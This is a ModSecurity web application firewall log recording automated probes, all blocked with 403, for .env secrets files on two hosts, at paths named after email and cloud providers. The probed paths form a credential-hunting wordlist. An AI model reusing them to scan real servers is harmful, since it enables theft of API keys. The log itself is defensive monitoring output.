[Mon May 11 16:41:58.450039 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sendgrid/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/sendgrid/.env"] [unique_id "agHqtlV4kyjgo4bQBUha0wAAAMg"]
[Mon May 11 16:41:58.450548 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/sendgrid/.env"] [unique_id "agHqtlV4kyjgo4bQBUha0wAAAMg"]
[Mon May 11 16:41:58.450774 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/sendgrid/.env"] [unique_id "agHqtlV4kyjgo4bQBUha0wAAAMg"]
[Mon May 11 16:41:58.612198 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sparkpost/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/sparkpost/.env"] [unique_id "agHqtlV4kyjgo4bQBUha1AAAAMg"]
[Mon May 11 16:41:58.612684 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/sparkpost/.env"] [unique_id "agHqtlV4kyjgo4bQBUha1AAAAMg"]
[Mon May 11 16:41:58.612913 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/sparkpost/.env"] [unique_id "agHqtlV4kyjgo4bQBUha1AAAAMg"]
[Mon May 11 16:41:58.777886 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postmark/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/postmark/.env"] [unique_id "agHqtlV4kyjgo4bQBUha1QAAAMg"]
[Mon May 11 16:41:58.778380 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/postmark/.env"] [unique_id "agHqtlV4kyjgo4bQBUha1QAAAMg"]
[Mon May 11 16:41:58.782394 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/postmark/.env"] [unique_id "agHqtlV4kyjgo4bQBUha1QAAAMg"]
[Mon May 11 16:41:58.951840 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailgun/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mailgun/.env"] [unique_id "agHqtlV4kyjgo4bQBUha1gAAAMg"]
[Mon May 11 16:41:58.952319 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mailgun/.env"] [unique_id "agHqtlV4kyjgo4bQBUha1gAAAMg"]
[Mon May 11 16:41:58.952558 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mailgun/.env"] [unique_id "agHqtlV4kyjgo4bQBUha1gAAAMg"]
[Mon May 11 16:41:59.117272 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mandrill/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mandrill/.env"] [unique_id "agHqt1V4kyjgo4bQBUha1wAAAMg"]
[Mon May 11 16:41:59.117748 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mandrill/.env"] [unique_id "agHqt1V4kyjgo4bQBUha1wAAAMg"]
[Mon May 11 16:41:59.117975 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mandrill/.env"] [unique_id "agHqt1V4kyjgo4bQBUha1wAAAMg"]
[Mon May 11 16:41:59.280349 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailjet/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mailjet/.env"] [unique_id "agHqt1V4kyjgo4bQBUha2QAAAMg"]
[Mon May 11 16:41:59.281039 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mailjet/.env"] [unique_id "agHqt1V4kyjgo4bQBUha2QAAAMg"]
[Mon May 11 16:41:59.281361 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mailjet/.env"] [unique_id "agHqt1V4kyjgo4bQBUha2QAAAMg"]
[Mon May 11 16:41:59.444492 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /brevo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/brevo/.env"] [unique_id "agHqt1V4kyjgo4bQBUha2gAAAMg"]
[Mon May 11 16:41:59.444967 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/brevo/.env"] [unique_id "agHqt1V4kyjgo4bQBUha2gAAAMg"]
[Mon May 11 16:41:59.445272 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/brevo/.env"] [unique_id "agHqt1V4kyjgo4bQBUha2gAAAMg"]
[Mon May 11 16:41:59.612111 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /transactional/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/transactional/.env"] [unique_id "agHqt1V4kyjgo4bQBUha3AAAAMg"]
[Mon May 11 16:41:59.612601 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/transactional/.env"] [unique_id "agHqt1V4kyjgo4bQBUha3AAAAMg"]
[Mon May 11 16:41:59.612816 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/transactional/.env"] [unique_id "agHqt1V4kyjgo4bQBUha3AAAAMg"]
[Mon May 11 16:41:59.644566 2026] [security2:error] [pid 1412074:tid 1412088] [client 45.12.2.133:37346] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agHqtzJnyuKVXoStDha6pAAAAEw"]
[Mon May 11 16:41:59.644929 2026] [security2:error] [pid 1412074:tid 1412088] [client 45.12.2.133:37346] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agHqtzJnyuKVXoStDha6pAAAAEw"]
[Mon May 11 16:41:59.774528 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bulk/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/bulk/.env"] [unique_id "agHqt1V4kyjgo4bQBUha3QAAAMg"]
[Mon May 11 16:41:59.775006 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/bulk/.env"] [unique_id "agHqt1V4kyjgo4bQBUha3QAAAMg"]
[Mon May 11 16:41:59.775253 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/bulk/.env"] [unique_id "agHqt1V4kyjgo4bQBUha3QAAAMg"]
[Mon May 11 16:41:59.939864 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /aws/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/aws/.env"] [unique_id "agHqt1V4kyjgo4bQBUha3wAAAMg"]
[Mon May 11 16:41:59.940389 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/aws/.env"] [unique_id "agHqt1V4kyjgo4bQBUha3wAAAMg"]
[Mon May 11 16:41:59.940656 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/aws/.env"] [unique_id "agHqt1V4kyjgo4bQBUha3wAAAMg"]
[Mon May 11 16:42:00.102114 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/azure/.env"] [unique_id "agHquFV4kyjgo4bQBUha4AAAAMg"]
[Mon May 11 16:42:00.102629 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/azure/.env"] [unique_id "agHquFV4kyjgo4bQBUha4AAAAMg"]
[Mon May 11 16:42:00.102867 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/azure/.env"] [unique_id "agHquFV4kyjgo4bQBUha4AAAAMg"]
[Mon May 11 16:42:00.265984 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/gcp/.env"] [unique_id "agHquFV4kyjgo4bQBUha4QAAAMg"]
[Mon May 11 16:42:00.266990 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/gcp/.env"] [unique_id "agHquFV4kyjgo4bQBUha4QAAAMg"]
[Mon May 11 16:42:00.267296 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/gcp/.env"] [unique_id "agHquFV4kyjgo4bQBUha4QAAAMg"]
[Mon May 11 16:42:00.447302 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cloud/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cloud/.env"] [unique_id "agHquFV4kyjgo4bQBUha4gAAAMg"]
